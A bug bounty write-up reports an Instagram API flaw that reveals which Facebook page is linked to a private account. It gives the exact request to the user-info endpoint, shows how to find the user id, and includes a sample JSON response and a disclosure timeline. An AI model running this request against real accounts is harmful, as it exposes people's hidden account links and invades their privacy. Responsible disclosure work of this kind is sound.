Page admin disclosure via facebook profile link embedded in instagram

There is a feature in instagram to show your linked facebook account. On the same way, an instagram user also can link his/her facebook page. When doing these together, an attacker can disclose the connected facebook page of a same facebook user whose profile link has been embedded in that instagram account.

It discloses the connected facebook account/facebook page with any instagram account(private too) which is not even seen in https://www.facebook.com/ads/library/?active_status=all&ad_type=all&country=US&view_all_page_id=PageID&search_type=page&media_type=all

Proof of concept

Request:

GET /api/v1/users/ig_id/info/ HTTP/2
Host: i.instagram.com
-other headers-

where,
ig_id=instagram user id of private instagram account (not shadow id) which can be get from the web itself.

To get ig_id, go to below link , you will get json response and search for logging_page_id.
https://www.instagram.com/username/?__a=1&__d=dis

Response:

{"user":{"biography":"Footballer ⚽️ at day 🌞 || Bug hunter 🎭️ at night 🌃\n#football #fcbarcelona #infosec #bugbounty","primary_profile_link_type":0,"show_fb_link_on_profile":true,"show_fb_page_link_on_profile":false,"can_hide_category":true,"smb_support_partner":null,"current_catalog_id":null,"mini_shop_seller_onboarding_status":null,"account_category":"","can_add_fb_group_link_on_profile":false,"can_use_affiliate_partnership_messaging_as_creator":false,"can_use_affiliate_partnership_messaging_as_brand":false,"existing_user_age_collection_enabled":true,"fbid_v2":"17841404238393811","feed_post_reshare_disabled":false,"full_name":"Manoj Gautam","has_public_tab_threads":true,"highlight_reshare_disabled":false,"include_direct_blacklist_status":true,"is_direct_roll_call_enabled":true,"is_new_to_instagram":false,"is_private":true,"pk":4270493279,"pk_id":"4270493279","profile_type":0,"show_account_transparency_details":true,"show_ig_app_switcher_badge":true,"show_post_insights_entry_point":true,"show_text_post_app_badge":false,"show_text_post_app_switcher_badge":true,"third_party_downloads_enabled":0,"strong_id__":"4270493279","biography_with_entities":{"raw_text":"Footballer ⚽️ at day 🌞 || Bug hunter 🎭️ at night 🌃\n#football #fcbarcelona #infosec #bugbounty","entities":[{"hashtag":{"id":"17843881846027410","name":"football"}},{"hashtag":{"id":"17843844070000942","name":"fcbarcelona"}},{"hashtag":{"id":"17843805634059707","name":"bugbounty"}},{"hashtag":{"id":"17843744590011567","name":"infosec"}}]},"external_url":"","category":null,"is_category_tappable":false,"is_business":false,"professional_conversion_suggested_account_type":2,"account_type":1,"displayed_action_button_partner":null,"smb_delivery_partner":null,"smb_support_delivery_partner":null,"displayed_action_button_type":null,"is_call_to_action_enabled":null,"num_of_admined_pages":null,"page_id":null,"page_name":null,"ads_page_id":290263164472632,"ads_page_name":"Gtm Mänôz","shopping_post_onboard_nux_type":null,"ads_incentive_expiration_date":null,"account_badges":[],"active_standalone_fundraisers":{"total_count":0,"fundraisers":[]},"auto_expand_chaining":true,"avatar_status":{"has_avatar":true},"bio_links":[{"link_id":17985440860864340,"url":"https://www.facebook.com/Gtm0x01","lynx_url":"","link_type":"facebook","title":"Facebook profile","open_external_url_with_in_app_browser":true},],

The above response will disclose ads_page_id with page id and ads_page_name with page name.

Impact

Page admin disclosure

Timeline

• 19 Jan, 2023 — Report sent to facebook.
• 24 Jan, 2023 — Triaged.
• 29 Mar, 2023 — Bounty awarded by facebook.
• 5 Jun, 2023 — Requested facebook to update about the fix.
• 3 Aug, 2023 — Informative by facebook.